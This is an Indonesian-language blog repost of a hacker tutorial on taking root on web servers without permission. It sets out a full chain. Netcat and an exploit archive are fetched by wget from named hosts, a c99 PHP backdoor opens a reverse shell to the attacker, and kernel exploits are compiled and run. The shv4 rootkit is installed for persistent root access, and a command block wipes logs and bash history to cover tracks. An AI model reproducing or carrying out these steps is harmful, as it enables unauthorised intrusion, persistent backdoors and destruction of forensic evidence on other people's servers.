Demo Blog

How to use local root exploit

by d0ntcry on Nov.22, 2009, under

-=-=-=-=-=-=-=-=-=-=-=-=-=-
Tutorial by iLhaM BLoodroSE
How to use local root exploit
www.rosebanditz.org
-=-=-=-=-=-=-=-=-=-=-=-=-=-

hy :-D
lgsg aja ya :haha:

bahan2 yang kamu butuhkan adalah :
*local.tgz -> download di http://d.rosebanditz.org
*NC -> download di http://d.rosebanditz.org
*target php (safe mode OFF)
*ssh account
*putty

@mengapa harus menggunakan ssh , dalam ngeroot ini
karena jika menggunakan shell target php , tidak bisa melakukan
bash command , bash command harus diaksses melalui ssh

the way is :
1. cari target php safe mode off yg firewallnya ga keblock
(cek port refused ato time out , kalo time out kemungkinan besar ga bisa connect pake NC )

2. buka putty kamu . login. terus masukin NC nya , (wget http://bloodrose.tk/download/exploit/nc ) kalo wget ga bisa pakai lwp-download , curl -O , kalo masih ga bisa pake winscp untuk mindah NC ke ssh kamu.

3. di ssh ketik chmod 777 nc / chmod +x nc

4. kembali pada target php gunakan backdoor c99 versi FaTaLisTiCz_Fx Fx29Sh v1 06.2008 c99 shell
download di : http://rosebanditz.tk/file/download.php?id=c74d97b01eae257e44aa9d5bade97baf

5. kembali pada putty aktifkan open port nc dengan command
./nc -lvp port misalnya ./nc -lpv 8910

6. lalu pada target php tadi dengan menggunakan backdoor tersebut
pilih backconnect gunakan isi port 8910 dan masukkan ip host dari putty kamu pilih perl lalu click connect kalo perl OFF gunakan C lalu connect

7. cek ssh kamu apabila sudah konek maka akan tersambung dengan
data2 ditarget php kamu

8. ready to war , sekarang kamu download local.tgz melalui ssh tadi yang sudah terkonek dengan shell target php , wget http://bloodrose.tk/download/exploit/local.tgz , sekali lagi kalo wget ga bisa masukkan pake lwp-download ato curl -O , kalo semisalnya masihg belum bisa masukan dengan download binary safe pada shell target php kamu

9. setelah sudah didownload ketik tar -zxvf local.tgz

10. masuk folder local dengan mengetik command cd local , lalu ketik ls -als untuk mengecek isinya

11. nah disinilah keberuntngan mulai bermain , cek kernel dengan command uname -a

12. tidak semua kernel bisa diexploit ( apalagi yg udah dipatch) hwhw
misalnya saja kita pake kernel 2.4.20 kebanyakn ini bisa di root pake exploit w00t pada local.tgz tadi jadi saat di folder local ketik ./w00t tunggu sebentar, dan wow you got the root ! :D , dan misalnya
ga pake kernel tersebut kamu bisa menggunakn exploit2 yang lain yang bisa kamu cek dengan google , ketik aja "local exploit kernel 2.4.40 misalnya , cari yg cocok lalu wget aja ke ssh kmu, misal berformat .c , misal , martha.c untuk mengexsprotnya ketik cc -o xpl martha.c , martha.c berganti dengan xpl lalu chmod +x xpl lgsg run ./xpl , tunggu aja beberapa saat lalu cek id jika id root u got the root!

13. setelah dapat root apa yang harus kita lakukan ?menginstal backdoor , saya selalu mengguhana shv untuk menginstall backdoor
saya menggunakan shv4.tar.gz , jadi commandnya sebagai berikut
pada putty kamu :

* download/upload it :
http://bloodrose.tk/download/exploit/shv4.tar.gz
* tar -zxvf shv4.tar.gz
* cd shv4
* ./setup password port
* finish :D
* cek portnya sudah accpeted apa belum kalo sudah acpted
login dengan putty pada port tersebut dan host ip tersebut
username : root password : passwordnya


14. menghapus jejak, menghapus jejak hoho mungkin banyak sekali tutor yg menjelaskan menghapus jejak , tapi saya sendiri tidak terlalu extrem menggunakan seperti itu
yg dimana namanya kita masuk tanpa izin pasti tercium juga baunya
hahaha, apalagi kalo kita gunakan root root itu dengan menginstal server , psy , bot misalnya. meskipun sudah disembunyikantetapi tetap terlihat juga (kebetulan saya pernah jadi sysadmin hehe)
tapi biasanya saya menggunakan juga command seperti ini :


echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ; touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ; rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r



15. sekarang terserah anda mo diapain root itu , tapi pesan saya
jangan merusak karena kasian sysadminya dan yg punya rootnya
karena mereka bekerja untuk itu , tapi ya terserah sih hak pribadi masing2 hoho :beer:


#################################

jika masih ada yg bingung bisa disampaikan disini
atau email ke admin@rosebanditz.org

sampe jumpa ditutorial berikutnya :semangat:

by iLhaM BLoodroSE
3 komentar more...

3 komentar

  • d0ntcry

    andreanz :
    website.. bukan wapsite bos...
    abis bilang website trus koq bilang blog bos??
    website ma blog sama ya bos???

    gua da ijin ma yg nulis.setiap aq copas ma punya orang ta tulis sumbernya bos....
    dan mksud gua ta taruk diblog sampah ne cuma sebagai catatan gua.
    kalo gak suka gak sa keblog sampah ini bos....
    kakean cocot gak ono buktine...

Looking for something beib?

Use the form below to search the site:

Still not finding what you're looking for? Drop a comment on a post or contact us so we can take care of it!